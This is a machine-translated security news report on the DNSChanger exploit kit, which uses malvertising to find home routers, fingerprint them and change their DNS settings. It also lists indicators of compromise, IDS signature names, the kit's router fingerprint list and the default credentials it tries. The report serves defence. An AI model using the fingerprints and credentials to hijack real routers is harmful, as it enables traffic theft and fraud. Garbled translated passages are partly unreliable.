Copyright: Attribution, allow others to create paper-based, and must distribute paper (based on the original license agreement with the same license Creative Commons )
Come the summer, all kinds of discounts coming at the same time, a new type of malicious software has been on the line.
DNSChanger the name, you might have heard about. This malware has infected in 2012 in the range of millions of computers around the world.
Recently, ProofPoint researchers found that the upgraded version of the DNSChanger EK (exploit kits), which uses malicious advertising communication. After the infected user equipment, the exploit kit to modify the router's DNS server entry, point to a malicious DNS server controlled by the attacker. After the infection, if the user wants to access a page, the malicious DNS server may direct users to phishing sites. An attacker could also embedded advertising, redirecting search results and horses hang on site.
According to published reports ProofPoint, an upgraded version of DNSChanger EK active from the end of October, with the recent series of attacks malicious advertising activities. DNSChanger EK attack by the user's browser router, it is not exploitable vulnerabilities browser or device, but the home router vulnerabilities, but also seems to include many known router exploit. DNSChanger EK general to attack the Windows desktop and Android devices in the Chrome browser. However, once the router is attacked, all users connected to the router, regardless of which operating system and browser use, will suffer further attacks.
DNSChanger EK attack router's behavior seems to be related to the recent wave of malicious advertising attacks. After analyzing its attack mode and the chain of infection, the researchers concluded that these behaviors occur with the first half of 2015, "cross-site request forgery Soho pharming (CSRF Soho Pharming)" for the same attacker (or organization) should do.
However, compared to 2015 activity, the researchers found the new features of the recent wave of attacks:
Internal external DNS address resolution
Use steganography to hide:
AES keys for decrypting the fingerprint / default list of credentials and resolved locally
Deploy command targets router
More than a dozen new router exploit: the existing 166 fingerprint, some of which affect a number of router models, while in 2015, only 55 fingerprint. For example, for "Comtrend
ADSL Router CT-5367/5624" router exploit first appeared a few weeks ago (September 13, 2016), and the attack began about October 28.In 36 cases, the exploit kits modify the network rule, the external address can access the management port, causing the router may be subject to further attacks, such as the Mirai botnet infections.
Android devices have also become a medium of such attacks.
Chain attacks:
The attacker legitimate website malicious ads, trapping the user's network.
Complete attack process as shown:
The following figure shows the researchers capture traffic:
Attack Analysis:
When a user clicks a malicious ad computer terminal or mobile phone side, it will send traffic to the DNSChanger EK.
DNSChanger EK [.] Com Mozilla STUN server by sending to stun.services.mozilla WebRTC request, obtain a local IP address of the user. If the public IP address of the user's known or their local IP target range is not displayed to the user in a legal advertisement published by third-party advertisers. Otherwise, the user will see a malicious ad. JavaScript HTML code is extracted from the comment field PNG file, the user will be redirected to the page containing the DNSChanger EK. Note that the figure of (1) figure is false advertising, and not a .jpg file, but PNG file.
DNSChanger EK again requested to check the local IP address of the user by STUN. Subsequently, DNSChanger EK began to load multiple functions, and will write a surgery AES key hidden in the picture with a small hidden.
This key is used to decrypt a fingerprint list, after removal of duplicates, the list contains 129 entries (complete list see annex).
The user's browser attempts to locate and identify the network router (upper panel). After running the browser search function will return DNSChanger EK report, DNSChanger EK command will return the browser to attack the router.
DETAILED DESCRIPTION specific router model browser search found during the decision to attack: If no exploit, will try the default login credentials (such as admin: admin, admin: 1234, admin: password, admin: 12345 , etc.); if is available exploit, will modify DNS entries in the router, if possible (129 fingerprint in the 36 can do), will address the external management port open, it can cause the router to suffer further attacks such as botnet infection by Mirai Wait.
After infection:
The researchers said that the purpose of such modifications router DNS attacks are usually not clear, but in this case, they identified at least one of the motives. Compared trusted public DNS server and said rogue DNS servers to resolve, the researchers found that the main purpose of the attacker is to steal some large advertisers website traffic.
The attacker force corresponding to the Analytical 193.238.153 [.] Or 10 46.166.160 [.] 187. Depending on each domain, an attacker could modify the advertising behavior, modify the target site (for example, click anywhere on the page may pop), or replace the original ad.
The researchers found that the attacker will direct traffic Fogzy (a.rfgsi [.] Com) and TrafficBroker, and have contacted these agencies to get more information and to inform them of network traffic have been stolen.
Sphere of influence
Because the failure to obtain the fingerprint data link between the victims and the corresponding side of the router, the researchers can not provide a complete list of routers affected by this threat. However, because the toolkit integrates all known exploit, the researchers recommended that all users update the router's firmware to the latest version known.
The researchers found that at least several routers are affected:
D-Link DSL-2740R
COMTREND ADSL Router CT-5367 C01_R12
NetGear WNDR3400v3 (and likely other models in this series)
Pirelli ADSL2/2+ Wireless Router P.DGA4001N
Netgear R6200
In addition, Netgear's R7000, R6400, and other types of routers have been exposed 0-day exploit. ProofPoint also examined the DNSChanger especially in fingerprint associated with these models, but as of December 12, 2016, did not find the relevant fingerprint. However, the researchers still recommend that you follow the advice given by US-CERT, disables the web server on the affected Netgear router, because they expect above-mentioned 0-day exploit will also be added to the DNSChanger EK in the near future. Netgear also released several beta version of firmware for the exposed vulnerabilities, users can download the update in a timely manner.
In many cases, just close home routers remote management capabilities can improve their security. But in this case, an attacker using a wired or wireless network connection on a device. Therefore, no need to open the remote management, an attacker can successfully modify router settings.
Mitigation measures
Unfortunately, there is no simple way to resist such attacks. Currently the best mitigation solution is to update to the latest version of the router. Modify the default local IP address range, it may also play a protective role. In addition, some browser plug-ins to block ads may also play a role, after all these attacks began in malicious ads.
Epilogue
When an attacker controls a DNS server in the network, the network device may encounter a variety of malicious attacks, including bank fraud, middle attacks, phishing, fraud and other advertising. In this case, DNSChanger EK allow an attacker to take advantage of the home network only DNS server, that is, the Internet router itself. Overall, to avoid such attacks requires periodic repair router manufacturer firmware, the user is updated regularly patch.
appendix
IoC:
Domain | IP Comment
modificationserver.com | 93.115.28.248 Malvertising Step 2 in front of the EK – 2016-12
expensiveserver.com | 46.28.67.21 Malvertising Step 1 in front of the EK – 2016-12
immediatelyserver.com Malvertising in front of the EK – 2016-11
respectsserver.com | 217.12.220.127 Malvertising Step1 in front of the EK – 2016-10
ad.reverencegserver.com Malvertising Step2 in front of the EK – 2016-10
parametersserver.com|93.115.28.249 DNSChanger EK/ RouterEK – 2016-12
phosphateserver.com DNSChanger EK/ RouterEK – 2016-11
cigaretteinserver.com DNSChanger EK/ RouterEK – 2016-10
From 46.17.102.10 up to 24 Rogue DNS Servers
From 5.39.220.117 up to 126 Rogue DNS Servers
From 217.12.218.114 up to 121 Rogue DNS Servers
From 93.115.31.194 up to 244 Rogue DNS Servers
193.238.153.10 and 46.166.160.187 Substituted IP for targeted traffic (impersonating server) Traffic to that host is most probably a symptom of DNS entries modified on the router.
pix1.payswithservers.com External domain for 192.168.1.1
pix2.payswithservers.com External domain for 192.168.8.1
pix3.payswithservers.com External domain for 192.168.178.1
pix4.payswithservers.com External domain for 192.168.0.1
pix5.payswithservers.com External domain for 192.168.10.1
pix6.payswithservers.com External domain for 192.168.137.1
pix7.payswithservers.com External domain for 10.10.10.1
pix8.payswithservers.com External domain for 192.168.100.1
pix9.payswithservers.com External domain for 10.1.1.1
pix10.payswithservers.com External domain for 10.0.0.1
pix11.payswithservers.com External domain for 192.168.2.1
pix12.payswithservers.com External domain for 192.168.254.1
pix13.payswithservers.com External domain for 192.168.11.1
pix14.payswithservers.com External domain for 192.168.3.1
sub[i].domain254.com for 0 < i < 18 Not resolving
sub16.domain.com Resolving to 66.96.162.92
sub17.domain.com Resolving to 66.96.162.92
部分ET签名:
2023473 || ET CURRENT_EVENTS DNSChanger EK Secondary Landing Oct 31 2016
2021090 || ET CURRENT_EVENTS DNSChanger EK Landing May 12 2015
2023466 || ET EXPLOIT D-Link DSL-2740R Remote DNS Change Attempt
2020487 || ET EXPLOIT Generic ADSL Router DNS Change GET Request
2020488 || ET EXPLOIT Generic ADSL Router DNS Change POST Request
2020854 || ET CURRENT_EVENTS DRIVEBY Router DNS Changer Apr 07 2015
2020856 || ET EXPLOIT TP-LINK TL-WR340G Router DNS Change GET Request
2020857 || ET EXPLOIT Belkin Wireless G Router DNS Change POST Request
2020858 || ET EXPLOIT Linksys WRT54GL Router DNS Change POST Request
2020859 || ET EXPLOIT Netgear WNDR Router DNS Change POST Request
2020861 || ET EXPLOIT Motorola SBG900 Router DNS Change GET Request
2020862 || ET EXPLOIT ASUS RT N56U Router DNS Change GET Request 1
2020863 || ET EXPLOIT ASUS RT N56U Router DNS Change GET Request 2
2020871 || ET EXPLOIT ASUS RT N56U Router DNS Change GET Request 3
2020873 || ET EXPLOIT D-link DI604 Known Malicious Router DNS Change GET Request
2020874 || ET EXPLOIT Netgear DGN1000B Router DNS Change GET Request
2020875 || ET EXPLOIT Belkin G F5D7230-4 Router DNS Change GET Request
2020876 || ET EXPLOIT Tenda ADSL2/2+ Router DNS Change GET Request
2020877 || ET EXPLOIT Known Malicious Router DNS Change GET Request
2020878 || ET EXPLOIT TP-LINK TL-WR841N Router DNS Change GET Request
2020896 || ET CURRENT_EVENTS DRIVEBY Router DNS Changer Apr 07 2015 M2
2023467 || ET EXPLOIT COMTREND ADSL Router CT-5367 Remote DNS Change Attempt
2023468 || ET EXPLOIT Unknown Router Remote DNS Change Attempt
2023628 || ET EXPLOIT Netgear R7000 Command Injection Exploit
2823788 || ETPRO TROJAN DNSChanger Rogue DNS Server (A Lookup)
2823811 || ETPRO CURRENT_EVENTS DNSChanger EK DNS Reply Adfraud Server 1 Dec 12 2016
2823812 || ETPRO CURRENT_EVENTS DNSChanger EK DNS Reply Adfraud Server 2 Dec 12 2016
fingerprint列表:
[-37,"/img/Netgeargenie.png",290,41,"0",0]
[-36,"/UILinksys.gif",165,57,"0",0]
[-32,"/redbull.gif",7,7,"1",0]
[-31,"/settings.gif",654,111,"0",0]
[-30,"/images/img_masthead.jpg",836,92,"0",0]
[-29,"/images/logo.png",183,46,"0",0]
[-28,"/images/top1_1.jpg",280,87,"1",0]
[-27,"/headlogoa.gif",370,78,"0",0]
[-26,"/image/logo_gn.gif",101,51,"0",0]
[-25,"/bg_logo.jpg",858,82,"0",0]
[-24,"/image/tops.gif",450,92,"0",0]
[-23,"/graphics/banner.png",1024,70,"1",0]
[-22,"/img/loading.gif",32,32,"0",0]
[-21,"/logo_corp.gif",95,50,"1",0]
[-20,"/img/banner.gif",778,60,"0",0]
[-19,"/down_02.jpg",133,75,"0",0]
[-18,"/redbull.gif",7,7,"0",0]
[-17,"/pic/head_01.gif",162,92,"0",0]
[-16,"/image/linksys_logo.png",230,30,"0",0]
[-15,"/file/Comtrend_banner.jpg",897,70,"1",0]
[-13,"/logo.gif",371,38,"1",0]
[-12,"/image/top/NETGEAR_Genie.png",512,60,"1",0]
[-11,"/img/Netgeargenie.png",290,41,"",0]
[-10,"/tmp.gif",700,54,"1",0]
[-9,"/wlan_masthead.gif",836,92,"0",0]
[-8,"/images/logo.png",146,38,"0",0]
[-6,"/image/top/logo.gif",300,38,"0",0]
[-4,"/button_log_in.gif",70,21,"0",0]
[-3,"/image/UI_Linksys.gif",166,58,"1",0]
[-2,"/smclg.gif",133,59,"0",0]
[-1,"/themes/TM04/Drift-logo.png",300,89,"0",0]
[0,"/graphics/topbar.jpg",900,69,"1",1]
[1,"/graphics/young.png",128,96,"1",0]
[2,"/images/bg_stripes.png",50,50,"1",0]
[3,"/image/logo.png",271,43,"0",0]
[5,"/images/logo.gif",133,59,"0",0]
[8,"/img/tenda-logo-big.png",199,45,"0",0]
[9,"/images/main_welcome.gif",850,179,"1",1]
[11,"/image/UI_Linksys.gif",288,58,"0",0]
[12,"/Images/img_masthead_red.gif",856,92,"0",0]
[13,"/settings.gif",750,85,"0",0]
[14,"/images/top-02.gif",359,78,"1",0]
[15,"/UI_Linksys.gif",165,57,"1",0]
[16,"/set_bt.gif",93,52,"0",1]
[18,"/images/top1_1.jpg",208,85,"1",0]
[19,"/graphics/head_logo.gif",121,64,"0",0]
[20,"/images/top1_1.jpg",280,87,"0",0]
[21,"/router_logo.jpg",79,50,"1",0]
[22,"/graphics/gui_admin_login.jpg",283,120,"0",0]
[23,"/ag_logo.jpg",164,91,"1",0]
[24,"/images/head_logo.gif",312,68,"0",0]
[25,"/menu-images/logo.gif",169,50,"1",0]
[28,"/image/UI_Linksys.gif",288,58,"1",0]
[29,"/Images/Logo.gif",143,33,"0",0]
[30,"/images/logo.gif",169,50,"0",0]
[31,"/pic/logo.png",287,69,"0",0]
[32,"/spin.gif",16,16,"1",0]
[33,"/icons/top_left.png",300,96,"1",0]
[34,"/headlogo.gif",121,64,"0",0]
[35,"/pictures/home.jpg",255,41,"1",0]
[37,"/images/new_qanner.gif",840,92,"0",0]
[38,"/zyxellg.gif",169,50,"0",0]
[39,"/imagesV/vlogo_blk.jpg",185,40,"0",0]
[40,"/images/New_ui/asustitle.png",218,54,"0",0]
[41,"/images/New_ui/asustitle_changed.png",218,54,"0",0]
[45,"/images/date_bg.png",71,70,"0",0]
[47,"/graphic/head_04.gif",836,92,"0",0]
[49,"/image/logo.gif",390,69,"0",0]
[50,"/images/data_1_voda.gif",149,28,"0",0]
[51,"/images/logo_wind.gif",156,28,"0",0]
[53,"/pic/ag_logo.jpg",164,91,"0",0]
[54,"/banner_s.gif",126,65,"1",0]
[55,"/logo.gif",270,69,"0",0]
[56,"/logo_320x23.png",320,23,"0",0]
[58,"/image/UI_Linksys.gif",165,57,"1",0]
[59,"/file/int_logo_4_firmware.gif",366,66,"1",0]
[61,"/images/header.jpg",800,70,"0",0]
[62,"/images/btn_apply.png",61,20,"0",0]
[63,"/tendalogo.gif",387,90,"0",0]
[64,"/file/Logo.gif",216,83,"1",0]
[65,"/body/logo.jpg",154,118,"0",0]
[68,"/head_logo_p1_encore.jpg",92,72,"0",0]
[69,"/images/UI_Linksys.gif",288,57,"0",0]
[70,"/images/title_2.gif",321,28,"1",0]
[71,"/home_01.gif",765,95,"0",0]
[74,"/wlan_masthead.gif",836,85,"0",0]
[75,"/settingsDGND3300.jpg",799,97,"0",0]
[76,"/main/banner_files/bannertxt.gif",672,40,"0",0]
[77,"/html/images/dsl604.jpg",765,95,"1",0]
[79,"/head_logo.gif",140,64,"0",0]
[80,"/images/logo.jpg",270,69,"0",0]
[81,"/images/logo_netis.png",121,31,"0",0]
[82,"/images/icon-Change_pencil.png",18,18,"0",0]
[83,"/logo1.gif",207,105,"0",0]
[85,"/images/icon_now.gif",14,14,"0",0]
[87,"/down_02.jpg",135,75,"0",0]
[88,"/Images/logo.gif",270,69,"1",0]
[89,"/UILinksys.gif",166,58,"1",0]
[91,"/image/UI_Linksys.gif",134,58,"1",0]
[92,"/logo.gif",390,69,"0",0]
[93,"/images/icon_now.gif",14,14,"1",0]
[95,"/Images/img_masthead_red.gif",836,92,"0",0]
[97,"/images/topbg.gif",960,66,"0",0]
[99,"/down_02.jpg",133,75,"1",0]
[102,"/images2/main_title.n704bcm.gif",758,74,"0",0]
[104,"/common/images/logo.gif",108,32,"0",0]
[105,"/Images/logo.gif",780,62,"0",0]
[106,"/images2/login_title.n704bcm.gif",299,62,"0",0]
[107,"/images2/login_title.n704a3.gif",299,62,"0",0]
[108,"/file/logo.gif",165,47,"1",0]
[110,"/images/login_title_n104t.gif",299,62,"0",0]
[111,"/img/redbull.gif ",7,7,"1",0]
[112,"/images/head_logo.gif",140,78,"0",0]
[114,"/img/title_RP614v4.gif",750,85,"0",0]
[115,"/UI_Linksys.gif ",273,44,"1",0]
[116,"/logo.gif",318,69,"0",1]
[117,"/pic/img_masthead.gif",836,92,"0",0]
[118,"/images/logo.gif",76,69,"0",0]
[119,"/images/logo_transparent.gif",156,129,"0",0]
[121,"/Images/bg_a1.gif",280,70,"0",0]
[122,"/images/index_wrapper_bg_3347.png",801,325,"0",0]
[123,"/images/vz_logo.gif",185,40,"0",0]
[124,"/file/Manhattan_Banner.png ",452,90,"1",0]
[125,"/Images/Logo.gif",150,47,"0",0]
[126,"/Images/Logo.gif",200,50,"0",0]
[127,"/images/corp_logo.gif",153,42,"0",0]
[128,"/images/logo.png",171,75,"0",0]
[129,"/cornerartD241.jpg",140,90,"0",0]